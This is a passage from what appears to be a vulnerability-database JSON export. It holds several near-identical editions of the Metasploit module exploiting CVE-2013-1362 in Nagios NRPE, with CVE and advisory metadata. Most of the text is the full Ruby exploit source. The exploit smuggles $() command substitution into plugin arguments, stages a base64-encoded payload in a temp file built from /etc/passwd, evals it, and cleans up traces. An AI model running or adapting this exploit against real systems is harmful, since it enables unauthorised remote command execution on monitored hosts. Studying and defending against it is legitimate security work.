Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-12T15:33:47", "differentElements": ["modified", "published"], "edition": 84}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-12T19:29:06", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-12T19:29:06", "differentElements": ["modified", "published"], "edition": 85}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-19T09:26:25", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-19T09:26:25", "differentElements": ["modified", "published"], "edition": 86}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-19T11:26:05", "history": [], "viewCount": 119, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:850457", "OPENVAS:865756", "OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:850460", "OPENVAS:1361412562310121262"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "nessus", "idList": ["SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9829.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0621-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2018-08-19T11:26:05"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-19T11:26:05", "differentElements": ["sourceData"], "edition": 87}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "221de7eb2a0f009605030c49b30fe87e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-03-14T11:02:27", "history": [], "viewCount": 119, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "nessus", "idList": ["SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-03-14T11:02:27"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-03-14T11:02:27", "differentElements": ["sourceData"], "edition": 88}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-03-14T12:50:57", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9848.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:850460", 